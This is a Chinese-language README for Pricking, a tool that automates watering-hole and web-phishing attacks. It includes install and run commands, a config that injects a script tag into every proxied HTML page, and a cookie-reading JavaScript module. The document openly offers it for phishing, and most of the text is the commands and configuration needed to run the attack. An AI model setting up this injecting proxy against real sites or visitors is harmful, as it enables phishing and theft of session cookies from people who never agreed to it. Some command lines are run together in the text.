Pricking 是一个自动化部署水坑和网页钓鱼的项目。
想要了解更多可以阅读:
💥 💥 💥 支持HTTPS/HTTP
更多使用方式可以参考 Pricking Wiki
使用本项目需要拥有一个域名,将A记录指向到当前服务器,否则只能通过IP访问。
$ go install -v github.com/Rvn0xsy/Pricking/cmd/pricking@latest$ git clone https://github.com/Rvn0xsy/Pricking
$ cd Pricking
$ make$ ./pricking -config ./config/config.yaml -url https://payloads.onlinefilter_type:
- "text/html" # 仅针对网页内容进行注入
exclude_file: # 静态文件的数据包不进行注入
- ".jpg"
- ".css"
- ".png"
- ".js"
- ".ico"
- ".svg"
- ".gif"
- ".jpeg"
- ".woff"
- ".tff"
static_dir: "./pricking-js-suite" # Pricking Js Suite 目录
pricking_prefix_url: "/pricking_static_files" # 静态目录名,不能与目标网站冲突
listen_address: ":9999" # 监听地址:端口
inject_body: "<script src='/pricking_static_files/static.js' type='module'></script>" # 注入代码- modules/cookie.js 获取网页Cookie并打印在控制台上
- ...
在static.js中添加:
import * as <ModuleName> from './modules/<ModuleName>.js'例如 cookie.js:
import * as Cookie from './modules/cookie.js'请为我提交Pull Request